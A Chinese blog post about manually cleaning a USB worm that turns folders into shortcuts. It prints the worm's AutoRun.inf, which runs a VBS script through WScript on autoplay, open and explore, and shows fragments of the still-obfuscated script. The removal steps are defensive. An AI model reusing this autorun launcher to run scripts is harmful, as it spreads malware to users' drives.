手工查杀一个蠕虫病毒

昨天上网聊天,正在聊得好的时候,去软件盘里面找软件,怎么都变成快捷方式了,都不显示了,我没开杀软,这一定是病毒在搞的鬼了,把快捷方式删除掉,软件盘里面什么都没有了,删除的都是快捷方式,没事,文件肯定还藏在磁盘里面,用了下DOS命令,ATTRIB,没效果,还是不显示,于是我进PE看了下,看到里面的文件了,看到了每个磁盘里面都有两个文件,一个是AutoRun.inf,另一个是1066705994.vbs,第一个AutoRun.inf这个配置文件,是干嘛的呢,之前写了一篇文章里面写的修改U盘图标,就是用的这个文件夹,就是自动加载的意思,只要单击一下,就会触发他,先说下我之前因为看不到文件的原因吧,之前看不到文件的原因,那是因为这两个文件是受保护的系统文件属性,所以,在文件夹选项选择,显示所有文件夹(包括隐藏文件夹),然后显示系统文件夹也不显示,还有一个,就是隐藏操作系统受保护的文件,这里把对号去掉就可以看到我们的文件夹而不是快捷方式了。。。
看下AutoRun.inf里面的内容:
[AutoRun]
Shellexecute=WScript.exe 1066705994.vbs “AutoRun”
shell\open=HH(&O)
shell\open\command=WScript.exe 1066705994.vbs “AutoRun”
shell\open\Default=1
shell\explore=HHHHH(&X)
shell\explore\command=WScript.exe 1066705994.vbs “AutoRun”
这配置文件里面的意思就是自动加载 1066705994.vbs 这个脚本。。。 下面看下脚本的内容:
‘b”3X&&#&3ex’)!x3ax,(jr
‘_%);a/+Gr/$n$!((Un!0;a/+X^.!|0!j}&!~0C=/~m%ko%*bI”%g`/5/o!h+]&`~o=DUn!0;r/$n$!((X^.!|0!j}&!~0C=3n~m%,oInc!(g=DU^|((;h|%*CDkp
‘5WDa/CKPijon
‘Ihy?llilyL_mog_yH_rn4>cgy;lam&yPclomFi[^&yPclom;mm4M_ny;lam7QM]lcjn(;laog_hnm4PclomFi[^7A_nG[chPclom”+#4Pclom;mm7A_nG[chPclom”*#4;laHog7*4>iyQbcf_y;laHogy6y;lam(=iohn4J[l[g7J[l[g {y{ ;lam”;laHog#4;laHog7;laHogy%y+4Fiijqr
‘}@-z,=,8gvm,>0R|423?Rz,=,8VJ]SSmk
‘Zlslj{‘Jhzl’Z|iWhyhtip
‘@^pb|~ork~rk
‘u92s%8,`o)*8Kzv’6-48Qv’6-48i900q%1)OCUL]f%00Cu92Ku92s%8,L]f%00Cl2:%()v=78)1Ky-697o3%(Oy-697d77L]f%00Cu92KEHv=78)1u338H 7=78)1 7:’,378Q)<)CEIy-697o3%(Lln
‘|;M?Y[NRN[eY[FIA[e[CHC[Ye[CH@[np
‘*MF(9L@tY\+QKL=E*GGL\4KQKL=Eji4&’,|(x{e|0|WY](9J9Eqz9DDW*MF_*MF(9L@`qz9DDW!FN9<=+QKL=E_.AJMK$G9<c.AJMKxKK`qz9DDW*MF_Y\+QKL=E*GGL\4KQKL=E4KN;@GKLe=P=WY].AJMK$G9<`nn
‘.L^PjlML_lvjlNXOlpm
…………………..
都是一堆乱码,可惜了,需要解密,解密需要用两次execute函数来解密,解密就不说了吧。。。喜欢研究的人可以去研究下,这个话题主要讨论手工查杀这个蠕虫病毒。。。
这个病毒其实很垃圾的,没什么破坏性,只是会把所有盘的文件夹变成快捷方式而已,只要把隐藏操作系统受保护的文件那里的 对号去掉,就是不让他隐藏,显示出来,把这两个文件删除就可以了,注意,要全盘都删除,只要有一个盘没删除,就会感染所有盘,我的好像是U盘感染了,手工查杀蠕虫病毒就是这样了,这个是比较低级的病毒,我把病毒提取出来了,下载了360杀毒软件,查杀下,杀软不报毒,虽然这个对电脑没什么大的危害,但是也具有恶意性了,所有有些东西,也不能全靠杀毒软件,不是有句话说:伤人之心不能有,防人之心不能没有,换到个人电脑上就应该讲:不防病毒之心不能有(防病毒之心不能没有),不用杀软之心不可有,嘿嘿,好像绕口令,这个病毒就是让我这么给清理掉的。。。

 

发表评论

电子邮件地址不会被公开。 必填项已用*标注

This site uses Akismet to reduce spam. Learn how your comment data is processed.